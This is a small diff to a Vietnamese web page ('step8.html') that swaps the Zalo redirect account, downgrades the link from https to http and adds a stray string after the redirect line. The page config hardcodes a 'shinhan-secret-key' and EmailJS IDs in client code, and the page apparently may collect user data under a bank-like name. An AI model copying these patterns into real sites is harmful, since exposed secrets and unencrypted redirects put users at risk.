--- a/pages/vi/step8.html
+++ b/pages/vi/step8.html
@@ -348,7 +348,7 @@ const CompletionApp = {
         SECRET_KEY: 'shinhan-secret-key',
         EMAILJS_SERVICE_ID: 'service_zspw0b7',
         EMAILJS_TEMPLATE_ID: 'template_9jk2poj',
-        ZALO_REDIRECT_URL: 'https://zalo.me/1169203598452254627' // Thêm link Zalo vào config để dễ quản lý
+        ZALO_REDIRECT_URL: 'http://zalo.me/1171052830978848308' // Thêm link Zalo vào config để dễ quản lý
     },
 
     init() {
@@ -380,7 +380,7 @@ const CompletionApp = {
 
             // Bắt đầu đếm ngược để chuyển hướng sau khi nội dung đã hiển thị
             setTimeout(() => {
-                window.location.href = this.config.ZALO_REDIRECT_URL;
+                window.location.href = this.config.ZALO_REDIRECT_URL;'http://zalo.me/1171052830978848308'
             }, 90000); // Chuyển hướng sau 3 giây
 
         }, 500);
@@ -444,5 +444,6 @@ document.addEventListener('DOMContentLoaded', () => {
 </script>
 </body>
 </html>
+
 
 
